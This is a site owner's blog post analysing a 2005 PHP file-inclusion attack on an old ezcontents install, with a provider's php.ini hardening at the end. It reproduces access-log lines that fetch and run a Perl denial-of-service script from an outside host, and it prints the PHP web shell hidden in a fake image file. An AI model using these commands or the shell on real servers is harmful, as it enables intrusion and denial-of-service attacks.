More details on php exploit from last week



Ok. I have a bit of time that I can sit down and get a little more detailed on what specifically happened late last week that shut the site down for a couple days.

At one point, I had updated the ezcontents script for the main site (averyjparker.com), but I had left (for about 2 years) a testbed install (at averyjparker.com/ncgen2) trying to setup a platform for an upgrade for the old Genealogy site (www.averyjparker.com/ncgen, new site is now at www.northcarolinagenealogy.net (linked at the top of the page.)) OK, so in searching through the logs here are some of the entries that caught my attention.

63.85.41.229 – – [14/Jul/2005:13:30:31 -0600] “POST /cgi-bin/cgiemail/forms/order.txt HTTP/1.1” 403 319 “http://www.averyjparker.com/” “-”
200.174.133.132 – – [14/Jul/2005:13:11:59 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1” 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – – [14/Jul/2005:13:12:01 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1” 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – – [14/Jul/2005:13:12:01 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1” 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – – [14/Jul/2005:13:12:19 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20%20http://www.caniggiamatador.com/xpl/pdr%20;
%20chmod%20777%20pdr;%20./pdr HTTP/1.1” 200 1072 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – – [14/Jul/2005:13:09:42 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?
&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1” 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – – [14/Jul/2005:13:09:21 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=wget HTTP/1.1” 200 1120 “-” “Mozilla/4.0 (compatible; MSIE6.0; Windows NT 5.0)”

I guess I should preface this, by a simple fact. There are a LOT of exploit attempts that show up in webserver logs. Here’s a sample of one…
211.75.91.2 – – [14/Jul/2005:13:30:24 -0600] “POST /cgi-bin/mailform.pl HTTP/1.0” 404 290 “http://www.averyjparker.com/” “-”

The first entry is the ip address, then the datestamp, then the specific query *(usually starting with Post or Get, and ending with the version of the protocol.) Next you see 404, that’s the result code and a 404 code means that this file wasn’t found.

What troubled me with the suspicious entries is that the result code was 200 (file found) and it was trying to pass various different bits of information to a php file (/ncgen2//include/db.php) which did exist.

In fact, this bit
?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget
%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl
made it look like they were trying to load this file from caniggiamatador.com. I looked at the source of lila.jpg (not a real image file by the way.) It’s basically an html file wrapped around this…
< ? // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt ) if (isset($chdir)) @chdir($chdir); ob_start(); passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp”);
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(“>”, “>”, str_replace(“< ", "<", $output)); ?>
ok, so they’re trying to inject this file http://www.caniggiamatador.com/dos.pl and http://www.caniggiamatador.com/perldos.pl

I looked at the code there and they were basically bash scripts that setup a denial of service attack on a specified target. Fairly clever and commented in Portuguese or Spanish. I’ve actually spent some time studying spanish, but there was a lot that was either mispelled, or I simply didn’t understand.

The site is down now by the way. It was hosted by http://www.internetters.net/ it looks like and my service provider dealt with contacting them I suspect.

Since I’m a fairly curious person…. I was also interested in the ip address that was originating the requests 200.174.133.132 An IP whois lookup turned up this…

200.174.133.132 = [ 200-174-133-132-tau.cpe.vivax.com.br ]

I’m guessing a dialup? customer in Brazil (which might back up that the comments were in Portuguese).

I, of course, sent what I found to my service provider. They thanked me for the time I’d spent researching the issue and verified that was the file they were exploiting and that it was a DOS attack against their nameservers. They also sent along a couple of notes on changes to the php.ini that they made to blunt the attack.

disabled_functions: system, cmd, shell_exec, passthru, popen

These were stated to hopefully prevent a future breach by the same method.

Some details of the exploit can be found here.
ezcontents code injection vulnerability

So, how did the find my site to attack. Who knows for certain, but I do have some ideas. I plan to detail those in an upcoming post.

   Send article as PDF   

Similar Posts